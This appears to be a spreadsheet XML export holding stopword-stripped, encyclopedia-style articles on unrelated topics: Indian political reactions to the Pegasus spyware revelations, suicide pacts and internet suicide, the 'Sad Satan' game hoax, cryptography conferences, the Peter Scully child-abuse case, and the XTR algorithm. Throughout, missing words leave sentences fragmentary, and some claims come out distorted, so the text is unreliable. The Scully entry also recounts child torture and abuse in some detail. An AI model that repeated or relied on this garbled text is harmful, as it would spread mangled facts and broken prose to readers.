upon. this unprecedented condemns unequivocally. snooping done ulterior motives. what disturbing foreign agency, nothing national interest country, engaged citizens. this breeds distrust invite anarchy. govt come clean front clarify.similarly, editor's guild india also released statement directed alleged spying made indian government, saying:this snooping essentially conveys journalism political dissent equated 'terror'. constitutional democracy survive governments make effort protect freedom speech allows surveillance impunity?it asked supreme court monitored enquiry matter, demanded inquiry committee include people impeccable credibility different walks life—including journalists civil society—so independently investigate facts around extent intent snooping using services pegasus.senior journalists sashi kumar approached supreme court seek investigation matter. they stated targeted surveillance "grossly disproportionate invasion right privacy". bench headed chief justice india ramana hear petition.some news articles released making claims amnesty never claimed leaked phone numbers nso's pegasus spyware list. these claims repeated leaders. however, reports later proven false, amnesty issued statement stating categorically stands findings investigation data irrefutably linked potential targets group's pegasus spyware. union government government denied usage pegasus spyware response far. government also denied request probe investigation independent supreme court inquiry opposition matter. former minister india ravi shankar prasad asked, nations using pegasus said, india targeted?"many members government ruling party home minister home internal security amit shah, minister electronics information technology ashwini vaishnaw, uttar pradesh chief minister yogi adityanath, karnataka chief minister basavaraj bommai, assam chief minister himanta biswa sarma devendra fadnavis alleged pegasus project international conspiracy malign indian democracy defame india. vaishnaw stated report came monsoon session parliament "this cannot coincidence" yogi adityanath said "the opposition, knowingly unknowingly, falling prey international conspiracy." devendra fadnavis said "the opposition want parliament smoothly. pegasus project conspiracy ruin nation".the official response government india washington post stated "[t]he allegations regarding government surveillance specific people concrete basis truth associated whatsoever" news reports attempt "malign indian democracy institutions". they stated case interception, monitoring decryption approved union home secretary exists oversight mechanism form review committee headed union cabinet secretary interceptions done process law.ashwini vaishnaw statement parliament stated reports "highly sensational" factual basis". stated rubbished claims. stated existence numbers list sufficient evidence indicate spyware used said report stated without physical examination phone claims cannot corroborated.amit shah statement blog insinuated attempt disrupt monsoon session parliament opposition parties "jumping bandwagon" trying "derail anything progressive comes parliament". stated report attempt "derail india's development trajectory conspiracies".replying allegations opposition, minister state ministry home affairs ajay kumar mishra said reason probe people made allegations "political failures". opposition july 2021, opposition parties coordinate response move joint adjournment notice sabha discuss pegasus snooping issue. meeting attended leaders congress, ncp, shiv sena, dmk, national conference, rsp, iuml, m.on july 2021, similar meeting leaders fourteen opposition parties took place. leaders congress, dmk, ncp, shiv sena, rjd, cpi, aap, iuml, rsp, attendance. indian national congress indian national congress accused prime minister narendra modi "treason" compromising national security following release reports called removal minister home internal security amit shah investigation role prime minister narendra modi affair. rahul gandhi, leader indian national congress, later claimed prime minister "hit soul democracy" using pegasus. went chair meeting consisting many opposition parties push jointly parliament discussion pegasus.shashi tharoor, senior leader indian national congress head parliamentary standing committee information technology. committee summoned officials ministry information technology ministry home affairs questioning regarding matter. however, committee unable meet members committee refused register attendance despite present, quorum met. reaction this, member committee stated: "what happened today shows lengths willing order discuss pegasus spyware issue".tharoor also demanded supreme court judge-monitored probe issue stated opposition would continue bring issue parliament central government would agree discuss issue. alleged central government made payer's money political gains.the former home minister finance minister, chidambaram, pointed countries france israel begun investigation matter, "only indian government concerned pegasus issue". also said prime minister must make statement parliament clarify whether snooping done central government. stated government "ostrich-like attitude" avoidance discussion subject parliament. india trinamool congress west bengal chief minister mamata banerjee, aitc, alleged central government intends "turn india surveillance state" "democracy danger". also claimed pegasus used keep track meetings prashant kishore 2021 west bengal elections. also said tape phone avoid spied on.she accused central government sitting idle matter setup judicial inquiry panel investigate allegations revealed pegasus project. sought party meeting discuss matter. advocate sharma john brittas, member rajya sabha party filed petition sought court-monitored probe allegations unauthorised pegasus spyware indian citizens. petition alleged pegasus indian citizens "serious attack upon indian democracy, judiciary country’s security." petition stated possibilities either snooping carried government india foreign agency. said carried government, would amount unauthorised spying indian citizens spending resources political gain ruling party allowed. petition stated snooping carried foreign actor, would "act external aggression" needed investigated. shiv sena sanjay raut, politician shiv sena stated "mobile phones become virtual bombs" used keep opponents ruling party. questioned government regarding source funding pegasus. called probe matter stating snoop phones would cost least million. investigations central government denied request investigation court monitored enquiry matter.west bengal chief minister mamata banerjee inquiry commission probe pegasus spyware. cabinet approved formation two-member inquiry commission lead retired supreme court justice madan lokur former calcutta high court acting chief justice jyotirmay bhattacharya. chief minister banerjee said wished central committee, state government committee central government's inaction matter. some politicians member dilip ghosh, dismissed committee called "drama" divert people's attention. october 2021, honourable supreme court india agreeing central-based inquiry needed, ordered independent probe issue three-member committee. west bengal government agreed commission function parallel committee supreme court; however, independent state commission continued operate december 2021 ordered directly supreme court cease. also democratic backsliding whatsapp snooping scandal references</t>
  </si>
  <si>
    <t>Suicide pact</t>
  </si>
  <si>
    <t>suicide pact agreed plan individuals commit suicide. plan together, separately closely timed. general considerations suicide pacts important concept study suicide, occurred throughout history, well fiction. example suicide pact rudolf, crown prince austria baroness mary vetsera.suicide pacts sometimes contrasted mass suicides, understood incidents larger number people kill together ideological reason, often within religious, political, military paramilitary context. "suicide pact" tends connote small groups non-ideological motivations, bonding married romantic partners, family members friends, even criminal partners. legal aspects england wales, suicide pact partial defense, section homicide 1957, reduces murder manslaughter. northern ireland, defense created section criminal justice (northern ireland) 1966 (n.i.). regional considerations first internet suicides israel occurred 1997, eran aderet, 19-year-old soldier, died expressing desire commit suicide online, received detailed instructions accomplish rifle possession. following case, 1999, israeli association, sahar, sought prevent suicide providing supportive conversations referrals relevant resources. 2005, following increase number internet suicide cases, police established special unit consists policemen specializes helping people confess online wanting commit suicide. unit keeps contact forum moderators, asked look posts suicidal users. about cases detected year, preventing dozens suicides. following success israeli model, similar units founded sweden, germany france. background although majority internet-related suicide pacts occurred japan (where takes name netto shinjū, ネット心中), similar incidents also reported countries including china, south korea, germany, australia, norway, united kingdom, canada united states. first known internet-related suicide pact occurred february 2000, norwegian austrian woman plunged metres famous cliff preikestolen, rogaland county, norway. later, norwegian woman came forward stating norwegian internet forum, planned commit suicide too, instead chosen austrian woman. both victims 20's. despite alarmed response media, internet-connected suicide pacts still relatively rare. even japan, pacts occurred, still represent group suicide-pacts, less 0.01% suicides combined. however, increasing country: deaths pacts occurred 2003; least estimated occurred 2004; deaths occurred 2005. notable example would hiroshi maeue, march 2007, sentenced death hanging, alleged murdered three participants suicide pact.an article published british medical journal december 2004, sundararajan rajagopal, consultant psychiatrist thomas' hospital london, highlighted emergence relatively phenomenon cybersuicide pacts, addressing psychiatric perspective. rajagopal commented "the recent suicide pacts japan might isolated events country even previously shown highest rate suicide pacts. alternatively, might herald disturbing trend suicide pacts, incidents, involving strangers meeting internet, becoming increasingly common. latter case epidemiology suicide pacts likely change, young people living own, committed suicide alone, joining like-minded suicidal persons together". internet suicide pacts article published canterbury suicide project makes notable comparisons nature "traditional" suicide pacts recent internet-related suicide pacts (or, described article, "cyber-based suicide pacts"). points traditionally suicide pacts: have extremely rare. involve older individuals (50–60 years old) adolescents. tend individuals family marriage-type relationships differing, complementary, psychiatric pathologies.on hand, growing number internet-related suicide pacts almost exact opposite: they involve young people almost exclusively. tend complete strangers individuals platonic friendship-type relationships. common characteristic among would seem clinical depression.the article also points trend internet-related suicide pacts changing mental-health workers need deal depressed and/or suicidal young people, advising "prudent clinicians routinely young people accessing internet sites, obtaining suicide information sites, talking suicide chat rooms". person enters internet suicide pact also lying intentionally. william francis melchert-dinkel example person made multiple internet suicide pacts, falsely promised hang person died suicide. melchert-dinkel later convicted criminally assisting attempting assist suicides providing detailed information suicide method. also internet homicide kumatarō kido yagorō tani lover's leap online predator shinjū social media suicide suicide internet suicide prevention contract, opposite suicide pact. "the constitution suicide pact," recurring concept american jurisprudence love suicides sonezaki (1978 film) virgin suicides yanaka five-storied pagoda double-suicide arson case references further reading biddle, lucy; donovan, jenny; hawton, keith; kapur, navneet; gunnell, david (2008). "suicide internet". bmj. (7648): 800–802. doi:10.1136/bmj.39525.442674.ad. 2292278. pmid 18403541. external links records first online suicide pact", age, september 2005</t>
  </si>
  <si>
    <t>Suicide and the Internet</t>
  </si>
  <si>
    <t>suicide internet increasingly important relationships internet becomes ubiquitous. several internet suicides occurred, issues involving social media suicide gained attention. survey found suicide-risk individuals went online suicide-related purposes, compared online users not, reported greater suicide-risk symptoms, less likely seek help perceived less social support. jurisdictional hindrances sometimes prevented governments effectively restricting pro-suicide sites sites describe suicide methods. israeli site, sahar, sought prevent suicide providing supportive conversations referrals help resources. 2008, police united kingdom expressed concern "internet cults" desire achieving prestige online memorials encourage suicides.although concerns internet dangerous platform, suicidal people might find suicide methods encouragement kill themselves, research shown internet likely positive negative influence. also death conrad instagram's impact people internet homicide blue whale challenge found dead body japanese suicide forest..., controversial youtube video logan paul showcasing friends discovering suicide victim's body. references</t>
  </si>
  <si>
    <t>Sad Satan</t>
  </si>
  <si>
    <t>satan game built terror engine, first reported youtube channel obscure horror corner june 2015.following initial reviews, channel's video game picked number english-language publications and, later, internationally. creator game allegedly lubbock, texas named gary graves. current whereabouts obscure horror corner unknown. history interview kotaku, channel's owner claims downloaded game hidden service receiving anonymous subscriber. subscriber turn claims found link deep internet forum, user known "zk". initially, followers skeptical game, fearing contained gore child pornography. however, owner obscure horror corner shared game contained material.following kotaku interview, subreddit "/r/sadsatan" formed reddit discuss game quickly realized .onion address provided obscure horror corner contained invalid characters. three days later, another interview obscure horror corner owner appeared kotaku claiming link purposefully given error, since game did, fact, contain graphic material, obscure horror corner channel owner want held responsible disseminating material. update kotaku article, patricia hernandez states: presented tale discovery skepticism. apologize that. while original article admits game exists mythical state tangible one, could gone farther make clear concrete jamie's tale wasn't. minutes update, version game posted 4chan someone claiming claiming obscure horror corner showing viewers "true" satan. members 4chan community downloaded version game attempted play some users complained computers began running sluggishly, even reported computers became completely unresponsive trying game. users even reported computers would turn anymore running version game. reddit user attempted play game live instead computer's main hard drive. later, user tried boot computer, computer failed start normally. this version game, dubbed "clone" /r/sadsatan community, contained images violent gore child pornography, accessible right title screen, resulting another version game graphic material removed (which often called "clean" version) created redditors subsequently redistributed.in 2017, lubbock, texas named gary graves arrested counts child pornography possession. youtube channel scarebere posted video titled satan. youtube channel question traced back reddit account created days post containing link "clone" posted 4chan; reddit account created scareberezk. another video found channel also showed middle aged man; credits video identified gary graves. video identical another gary found 2017 lubbock criminal registry, assume gary indeed creator poster "clone" game. speculation satan last game covered obscure horror corner, since then, youtube channel abandoned unknown reasons. there speculation game fact created owner obscure horror corner effort increase viewer subscription count, deep story complete scandal give whole account intrigue. some believe obscure horror corner created clone well attempt lend credibility claim actually gore child pornography game.it also possible satan created owner obscure horror corner, truth, owner channel decided hiding controversy malware version satan released. others also speculate owner obscure horror corner individual. content original game posted obscure horror corner features walking monochromatic corridors various audio samples played looped other. audio game leans heavily recordings interviews various murderers, charles manson. game also depends heavily distorted reversed audio interviews musical clips, song love beijing tiananmen, played beginning. reversed clips swedish rhapsody numbers station also heard. doors' rendition "alabama song" also heard, starting verse "show next little girl." while player controls character hallways, images intermittently display, taking entire screen preventing player progressing image automatically closes seconds later. most images seem reference child abuse, especially people indicted operation yewtree, images jimmy savile rolf harris. other images revolve around crime, include people convicted accused murder japanese child murderer, cannibal, rapist necrophile tsutomu miyazaki. included also photographs lady justice statues, colombian footballer andrés escobar political figures former prime minister margaret thatcher assassinated president john kennedy. works roger ballen walter sanders also included. "true" version 4chan, completely different game shown youtube, images accident victims murder victims also shown, including aftermath person struck truck, beheading. additionally, least version game contains image related case corinne danielle motley, florida woman arrested producing child pornography, image screencap video arrest. that particular version also contained virus caused wide range negative effects, causing infected computer become sluggish permanent shutdown, executable run. "characters" game children simply stand place move interact player all. final video posted obscure horror corner, children begin follow player, causing "contact damage". since player means self-defense ability heal damage, player inevitably point game. references external links satan reddit</t>
  </si>
  <si>
    <t>List of cryptography conferences</t>
  </si>
  <si>
    <t>this list conferences workshops area cryptography. financial cryptography data security, organized ifca monero konferenco, organized monero iacr affiliated conferences iacr sponsors following three conferences: crypto annual event takes place iacr sponsored since inception) eurocrypt annual event takes place europe iacr sponsored since inception) asiacrypt annual event takes place asia australia iacr sponsored since 2000) symposia iacr also sponsors following symposia. these different format traditional academic computer science conferences. they published proceedings, significant proportion speakers invited. organized cooperation iacr following events frequently organized cooperation iacr acns indocrypt conference, cryptographers track related areas focs (theory computing) stoc (theory computing) icalp (theory computing) international conference cryptography security system (security) references external links mihir bellare's list iacr's list crypto events</t>
  </si>
  <si>
    <t>Peter Scully</t>
  </si>
  <si>
    <t>peter gerard scully (born january 1963) australian offender imprisoned life philippines convicted count human trafficking five counts rape sexual assault underage girls. pending trial crimes children, including production dissemination child pornography, torture, alleged murder 11-year-old girl 2012. criminal activities peter scully lived suburb narre warren melbourne wife children prior fleeing city manila, philippines, 2011 could charged involvement property scheme cost investors $2.68 million. according statement, sexually abused priest victoria grew prior leaving melbourne, operated unlicensed online escort service offered filipina girlfriend worker. investigation australian securities investments commission 2009 found scully involved fraud deception offenses relating real estate scams. sexual abuse children from island mindanao, scully alleged built lucrative international child sexual abuse ring offered pay-per-view video streams children sexually abused tortured dark web. among victims ordeals recorded sold internet five-year-old raped tortured scully female accomplices.victims procured scully promises impoverished parents work, education, solicited filipina girlfriends, carmen alvarez liezyl margallo, female acquaintances maria dorothea chia. both alvarez margallo also abused children scully's videos. 2016, prosecutors alleged scully girlfriend coaxed teenage girls come scully's house promise food. scully alleged given girls alcohol forced perform acts them, scene photographer filmed. prosecutor alleged girls tried escape, scully forced graves basement house threatened would bury there. after five days, girls released girlfriend, carmen alvarez, began feeling remorse coming home collars reported happened. dark child pornography scully operated secret dark child pornography website known limits fun" ("nlf"). notorious video scully produced daisy's destruction, sold site clients $10,000. made 2012, multi-part video extreme time regarded urban legend. features torture rape three girls scully filipina women. urged scully, severe physical abuse carried children girlfriends, 19-year-old liezyl margallo, formerly trafficked child.prior video gaining attention general public, scully broadcast daisy's destruction privately pay-per-view basis. matthew graham eventually publicized time production. content, quickly garnered attention enforcement media. dutch national child exploitation team first open investigation goal locating victims. subsequently, international manhunt responsible video's production launched. scully tracked malaybalay city philippines arrested february 2015. investigators warrants arrest, relating abduction sexual abuse cousins. while searched scully philippines, investigators tracked three primary victims daisy's destruction. liza found alive daisy, lasting physical injuries severe treatment. according margallo, scully recorded video cindy, allegedly raped tortured her, made grave strangling rope.among acquired video biggest-ever purveyors child pornography, scully's fellow australian matthew david graham, better known online pseudonym lux. apprehended series "hurtcore" child pornography sites. graham said video could attract viewers network websites. criminal charges scully faced total charges and, according german television news channel n-tv, alleged sexually abused children. trial others assisted production pornography, including four men: german christian rouche, filipinos alexander althea chia, brazilian haniel caetano oliveira. margaret akullo, then-project coordinator united nations office drugs crime expert child abuse investigations, described case "horrific" worst ever heard crimes deemed severe prosecutors supported reintroduction death penalty punishment scully, despite capital punishment abolished philippines since 2006.in march 2015 interview tara brown minutes, scully said currently writing tell-all journal prison reflect motivations raping young children.in october 2015, fire severely damaged evidence room containing scully's computer logs videos, destroying evidence. some believe scully bribed local police officer, corruption philippines rife 2010s. june 2018, scully girlfriend alvarez sentenced life prison. both scully sister complained conditions jail scully held also child pornography philippines hurtcore references external links lindsay murdoch; chris vedelago march 2015). "peter gerard scully made philippines children grave: victims". age. fairfax media. retrieved june 2015. lindsay murdoch; tammy mills march 2015). "execution calls melbourne peter gerard scully accused depraved acts philippines". sydney morning herald. retrieved june 2015. escalante, shirley march 2015). "australian gerard peter scully formally charged murder, child sexual abuse philippines". news online. afp. archived original june 2015. retrieved june 2015. davey, melissa june 2015). "philippines police mount strong case accused australian paedophile". guardian. retrieved june 2015.</t>
  </si>
  <si>
    <t>XTR</t>
  </si>
  <si>
    <t>cryptography, algorithm public-key encryption. stands 'ecstr', abbreviation efficient compact subgroup trace representation. method represent elements subgroup multiplicative group finite field. uses trace {\displaystyle gf(p^{2})} represent elements subgroup {\displaystyle gf(p^{6})^{*}} from security point view, relies difficulty solving discrete logarithm related problems full multiplicative group finite field. unlike many cryptographic protocols based generator full multiplicative group finite field, uses generator {\displaystyle relatively small subgroup prime order {\displaystyle subgroup {\displaystyle gf(p^{6})^{*}} with right choice {\displaystyle computing discrete logarithms group, generated {\displaystyle general, hard {\displaystyle gf(p^{6})^{*}} thus cryptographic applications {\displaystyle gf(p^{2})} arithmetics achieving full {\displaystyle gf(p^{6})} security leading substantial savings communication computational overhead without compromising security. some advantages fast generation, small sizes speed. fundamentals uses subgroup, commonly referred subgroup group, subgroup called supergroup, multiplicative group finite field {\displaystyle gf(p^{6})} {\displaystyle p^{6}} elements. supergroup order {\displaystyle p^{2}-p+1} prime sufficiently large prime divides {\displaystyle p^{2}-p+1} subgroup order subgroup {\displaystyle gf(p^{6})^{*}} cyclic group {\displaystyle \langle g\rangle generator following three paragraphs describe elements supergroup represented using element {\displaystyle gf(p^{2})} instead element {\displaystyle gf(p^{6})} arithmetic operations take place {\displaystyle gf(p^{2})} instead {\displaystyle gf(p^{6})} arithmetic operations {\displaystyle gf(p^{2})} prime sufficiently large prime factor since generates {\displaystyle (\mathbb /3\mathbb )^{*}} thus third cyclotomic polynomial {\displaystyle \phi _{3}(x)=x^{2}+x+1} irreducible {\displaystyle gf(p)} follows roots {\displaystyle \alpha {\displaystyle \alpha ^{p}} form optimal normal basis {\displaystyle gf(p^{2})} {\displaystyle gf(p)} {\displaystyle gf(p^{2})\cong \{x_{1}\alpha +x_{2}\alpha ^{p}:x_{1},x_{2}\in gf(p)\}.} considering reduce exponents modulo {\displaystyle gf(p^{2})\cong \{y_{1}\alpha +y_{2}\alpha ^{2}:\alpha ^{2}+\alpha +1=0,y_{1},y_{2}\in gf(p)\}.} cost arithmetic operations given following lemma labeled lemma 2.21 overview public system":lemma computing done without using multiplication computing takes multiplications {\displaystyle gf(p)} computing takes three multiplications {\displaystyle gf(p)} computing xz-yzp takes four multiplications {\displaystyle gf(p)} traces {\displaystyle gf(p^{2})} trace always considered {\displaystyle gf(p^{2})} words, conjugates {\displaystyle h\in gf(p^{6})} {\displaystyle gf(p^{2})} {\displaystyle h,h^{p^{2}}} {\displaystyle h^{p^{4}}} trace {\displaystyle sum: {\displaystyle tr(h)=h+h^{p^{2}}+h^{p^{4}}.} note {\displaystyle tr(h)\in gf(p^{2})} since {\displaystyle {\begin{aligned}tr(h)^{p^{2}}&amp;=h^{p^{2}}+h^{p^{4}}+h^{p^{6}}\\&amp;=h+h^{p^{2}}+h^{p^{4}}\\&amp;=tr(h)\end{aligned}}} consider generator {\displaystyle subgroup prime order {\displaystyle remember {\displaystyle \langle g\rangle subgroup supergroup order {\displaystyle p^{2}-p+1} {\displaystyle q\mid p^{2}-p+1} following section choose {\displaystyle {\displaystyle sufficient assume {\displaystyle q&gt;3} compute trace {\displaystyle note modulo {\displaystyle p^{2}-p+1} {\displaystyle p^{2}=p-1} {\displaystyle p^{4}=(p-1)^{2}=p^{2}-2p+1=-p} thus {\displaystyle {\begin{aligned}tr(g)&amp;=g+g^{p^{2}}+g^{p^{4}}\\&amp;=g+g^{p-1}+g^{-p}.\end{aligned}}} product conjugates {\displaystyle equals {\displaystyle i.e., {\displaystyle norm crucial observation minimal polynomial {\displaystyle {\displaystyle gf(p^{2})} {\displaystyle (x-g)\!\ (x-g^{p-1})(x-g^{-p})} simplifies {\displaystyle x^{3}-tr(g)\!\ x^{2}+tr(g)^{p}x-1} fully determined {\displaystyle tr(g)} consequently, conjugates {\displaystyle roots minimal polynomial {\displaystyle {\displaystyle gf(p^{2})} completely determined trace {\displaystyle true power {\displaystyle conjugates {\displaystyle g^{n}} roots polynomial {\displaystyle x^{3}-tr(g^{n})\!\ x^{2}+tr(g^{n})^{p}x-1} polynomial completely determined {\displaystyle tr(g^{n})} idea behind using traces replace {\displaystyle g^{n}\in gf(p^{6})} cryptographic protocols, e.g. diffie–hellman exchange {\displaystyle tr(g^{n})\in gf(p^{2})} thus obtaining factor reduction representation size. this however, useful quick obtain {\displaystyle tr(g^{n})} given {\displaystyle tr(g)} next paragraph gives algorithm efficient computation {\displaystyle tr(g^{n})} addition, computing {\displaystyle tr(g^{n})} given {\displaystyle tr(g)} turns quicker computing {\displaystyle g^{n}} given {\displaystyle algorithm quick computation {\displaystyle tr(g^{n})} given {\displaystyle tr(g)} lenstra verheul give algorithm paper titled public system definitions lemmas necessary algorithm algorithm presented here, taken paper. definition {\displaystyle gf(p^{2})} define {\displaystyle f(c,x)=x^{3}-cx^{2}+c^{p}x-1\in gf(p^{2})[x].} definition {\displaystyle h_{0},\!\ h_{1},h_{2}} denote the, necessarily distinct, roots {\displaystyle f(c,x)} {\displaystyle gf(p^{6})} {\displaystyle {\displaystyle \mathbb define {\displaystyle c_{n}=h_{0}^{n}+h_{1}^{n}+h_{2}^{n}.} properties {\displaystyle c_{n}} {\displaystyle f(c,x)} {\displaystyle c=c_{1}} {\displaystyle c_{-n}=c_{np}=c_{n}^{p}} {\displaystyle c_{n}\in gf(p^{2}){\text{ }}n\in \mathbb {\displaystyle c_{u+v}=c_{u}c_{v}-c_{v}^{p}c_{u-v}+c_{u-2v}{\text{ }}u,v\in \mathbb either {\displaystyle h_{j}} order dividing {\displaystyle p^{2}-p+1} {\displaystyle {\displaystyle h_{j}} {\displaystyle gf(p^{2})} particular, {\displaystyle f(c,x)} irreducible roots order diving {\displaystyle p^{2}-p+1} {\displaystyle {\displaystyle f(c,x)} reducible {\displaystyle gf(p^{2})} {\displaystyle c_{p+1}\in gf(p)} lemma {\displaystyle c,\!\ c_{n-1},c_{n},c_{n+1}} given. computing {\displaystyle c_{2n}=c_{n}^{2}-2c_{n}^{p}} takes multiplication {\displaystyle gf(p)} computing {\displaystyle c_{n+2}=c_{n+1}\cdot c-c^{p}\cdot c_{n}+c_{n-1}} takes four multiplication {\displaystyle gf(p)} computing {\displaystyle c_{2n-1}=c_{n-1}\cdot c_{n}-c^{p}\cdot c_{n}^{p}+c_{n+1}^{p}} takes four multiplication {\displaystyle gf(p)} computing {\displaystyle c_{2n+1}=c_{n+1}\cdot c_{n}-c\cdot c_{n}^{p}+c_{n-1}^{p}} takes four multiplication {\displaystyle gf(p)} .definition {\displaystyle s_{n}(c)=(c_{n-1},c_{n},c_{n+1})\in gf(p^{2})^{3}} algorithm computation {\displaystyle s_{n}(c)} given {\displaystyle {\displaystyle {\displaystyle n&lt;0} apply algorithm {\displaystyle {\displaystyle apply property resulting value. {\displaystyle n=0} {\displaystyle s_{0}(c)\!\ =(c^{p},3,c)} {\displaystyle n=1} {\displaystyle s_{1}(c)\!\ =(3,c,c^{2}-2c^{p})} {\displaystyle n=2} computation {\displaystyle c_{n+2}=c_{n+1}\cdot c-c^{p}\cdot c_{n}+c_{n-1}} {\displaystyle s_{1}(c)} find {\displaystyle c_{3}} thereby {\displaystyle s_{2}(c)} {\displaystyle n&gt;2} compute {\displaystyle s_{n}(c)} define {\displaystyle {\bar {s}}_{i}(c)=s_{2i+1}(c)} {\displaystyle {\bar {m}}=n} {\displaystyle {\bar {m}}=n-1} otherwise. {\displaystyle {\bar {m}}=2m+1,k=1} compute {\displaystyle {\bar {s}}_{k}(c)=s_{3}(c)} using lemma {\displaystyle s_{2}(c)} {\displaystyle m=\sum _{j=0}^{r}m_{j}2^{j}} {\displaystyle m_{j}\in {0,1}} {\displaystyle m_{r}=1} {\displaystyle j=r-1,r-2,...,0} succession, following: {\displaystyle m_{j}=0} {\displaystyle {\bar {s}}_{k}(c)} compute {\displaystyle {\bar {s}}_{2k}(c)} {\displaystyle m_{j}=1} {\displaystyle {\bar {s}}_{k}(c)} compute {\displaystyle {\bar {s}}_{2k+1}(c)} replace {\displaystyle {\displaystyle 2k+m_{j}} .when iterations finish, {\displaystyle k=m} {\displaystyle s_{\bar {m}}(c)={\bar {s}}_{m}(c)} even {\displaystyle s_{\bar {m}}(c)} compute {\displaystyle {\bar {s}}_{m+1}(c)} parameter selection finite field subgroup size selection order take advantage described representations elements traces furthermore ensure sufficient security, discussed below, need find primes {\displaystyle {\displaystyle {\displaystyle denotes characteristic field {\displaystyle gf(p^{6})} {\displaystyle p\equiv {\text{mod}}\ {\displaystyle size subgroup, {\displaystyle divides {\displaystyle p^{2}-p+1} denote {\displaystyle {\displaystyle sizes {\displaystyle {\displaystyle bits. achieve security comparable 1024-bit rsa, choose {\displaystyle 1024, i.e. {\displaystyle p\approx 170} {\displaystyle around 160. first easy algorithm compute primes {\displaystyle {\displaystyle next algorithm algorithm find {\displaystyle r\in \mathbb {\displaystyle q=r^{2}-r+1} {\displaystyle -bit prime. find {\displaystyle k\in \mathbb {\displaystyle p=r+k\cdot {\displaystyle -bit prime {\displaystyle p\equiv {\text{mod}}\ .correctness algorithm a:it remains check {\displaystyle q\mid p^{2}-p+1} necessary properties obviously satisfied definition {\displaystyle {\displaystyle easily {\displaystyle p^{2}-p+1=r^{2}+2rkq+k^{2}q^{2}-r-kq+1=r^{2}-r+1+q(2rk+k^{2}q-k)=q(1+2rk+k^{2}q-k)} implies {\displaystyle q\mid p^{2}-p+1} .algorithm fast used find primes {\displaystyle satisfy degree-two polynomial small coefficients. such {\displaystyle lead fast arithmetic operations {\displaystyle gf(p)} particular search {\displaystyle restricted {\displaystyle k=1} means looking {\displaystyle {\displaystyle r^{2}-r+1{\text{ }}r^{2}+1} prime {\displaystyle r^{2}+1\equiv 2{\text{ }}3} primes {\displaystyle nice form. note case {\displaystyle must even {\displaystyle r\equiv 1{\text{ }}4} hand, {\displaystyle undesirable security point view make attack discrete logarithm variant number field sieve easier. following algorithm disadvantage, also fast arithmetic modulo {\displaystyle algorithm case. algorithm select {\displaystyle -bit prime {\displaystyle {\displaystyle q\equiv {\text{mod}}\ find roots {\displaystyle r_{1}} {\displaystyle r_{2}} {\displaystyle x^{2}-x+1\ {\text{mod}}\ find {\displaystyle k\in \mathbb {\displaystyle p=r_{i}+k\cdot {\displaystyle -bit prime {\displaystyle p\equiv {\text{mod}}\ {\displaystyle i\in \{1,2\}} correctness algorithm since chose {\displaystyle q\equiv {\text{mod}}\ follows immediately {\displaystyle q\equiv {\text{mod}}\ (because {\displaystyle 7\equiv {\text{mod}}\ {\displaystyle 3\mid from quadratic reciprocity deduce {\displaystyle r_{1}} {\displaystyle r_{2}} exist. check {\displaystyle q\mid p^{2}-p+1} consider {\displaystyle p^{2}-p+1} {\displaystyle r_{i}\in \{1,2\}} {\displaystyle p^{2}-p+1=r_{i}^{2}+2r_{i}kq+k^{2}q^{2}-r_{i}-kq+1=r_{i}^{2}-r_{i}+1+q(2rk+k^{2}q-k)=q(2rk+k^{2}q-k)} since {\displaystyle r_{1}} {\displaystyle r_{2}} roots {\displaystyle x^{2}-x+1} hence {\displaystyle q\mid p^{2}-p+1} subgroup selection last paragraph chosen sizes {\displaystyle {\displaystyle finite field {\displaystyle gf(p^{6})} multiplicative subgroup {\displaystyle gf(p^{6})^{*}} find subgroup {\displaystyle \langle g\rangle {\displaystyle gf\!\ (p^{6})^{*}} {\displaystyle g\in gf(p^{6})} {\displaystyle \mid \!\!\langle g\rangle \!\!\mid however, need find explicit {\displaystyle g\in gf(p^{6})} suffices find element {\displaystyle c\in gf(p^{2})} {\displaystyle c=tr(g)} element {\displaystyle g\in gf(p^{6})} order {\displaystyle but, given {\displaystyle tr(g)} generator {\displaystyle (sub)group found determining root {\displaystyle f(tr(g),\ defined above. find {\displaystyle take look property {\displaystyle f(c,\ stating roots {\displaystyle f(c,\ order dividing {\displaystyle p^{2}-p+1} {\displaystyle f(c,\ irreducible. after finding {\displaystyle need check really order {\displaystyle first focus select {\displaystyle c\in gf(p^{2})} {\displaystyle f(c,\ irreducible. initial approach select {\displaystyle c\in gf(p^{2})\backslash gf(p)} randomly justified next lemma. lemma: randomly selected {\displaystyle c\in gf(p^{2})} probability {\displaystyle f(c,\ x)=x^{3}-cx^{2}+c^{p}x-1\in gf(p^{2})[x]} irreducible third. basic algorithm find suitable {\displaystyle tr(g)} follows: outline algorithm pick random {\displaystyle c\in gf(p^{2})\backslash gf(p)} {\displaystyle f(c,\ reducible, return step algorithm compute {\displaystyle d=c_{(p^{2}-p+1)/q}} {\displaystyle order {\displaystyle return step {\displaystyle tr(g)=d} turns algorithm indeed computes element {\displaystyle gf(p^{2})} equals {\displaystyle tr(g)} {\displaystyle g\in gf(p^{6})} order {\displaystyle more details algorithm, correctness, runtime proof lemma found overview public system" cryptographic schemes section explained concepts using traces elements applied cryptography. general, used cryptosystem relies (subgroup) discrete logarithm problem. important applications diffie–hellman agreement elgamal encryption. start first diffie–hellman. xtr-dh agreement suppose alice access public data {\displaystyle \left(p,q,tr(g)\right)} intend agree shared secret {\displaystyle they using following version diffie–hellman exchange: alice picks {\displaystyle a\in \mathbb randomly {\displaystyle 1&lt;a&lt;q-2} computes algorithm {\displaystyle s_{a}(tr(g))=\left(tr(g^{a-1}),tr(g^{a}),tr(g^{a+1})\right)\in gf(p^{2})^{3}} sends {\displaystyle tr(g^{a})\in gf(p^{2})} bob. receives {\displaystyle tr(g^{a})} alice, selects random {\displaystyle b\in \mathbb {\displaystyle 1&lt;b&lt;q-2} applies algorithm compute {\displaystyle s_{b}(tr(g))=\left(tr(g^{b-1}),tr(g^{b}),tr(g^{b+1})\right)\in gf(p^{2})^{3}} sends {\displaystyle tr(g^{b})\in gf(p^{2})} alice. alice receives {\displaystyle tr(g^{b})} bob, computes algorithm {\displaystyle s_{a}(tr(g^{b}))=\left(tr(g^{(a-1)b}),tr(g^{ab}),tr(g^{(a+1)b})\right)\in gf(p^{2})^{3}} determines {\displaystyle based {\displaystyle tr(g^{ab})\in gf(p^{2})} analogously applies algorithm compute {\displaystyle s_{b}(tr(g^{a}))=\left(tr(g^{a(b-1)}),tr(g^{ab}),tr(g^{a(b+1)})\right)\in gf(p^{2})^{3}} also determines {\displaystyle based {\displaystyle tr(g^{ab})\in gf(p^{2})} elgamal encryption elgamal encryption suppose alice owner public data {\displaystyle (p,q,tr(g))} selected secret integer {\displaystyle 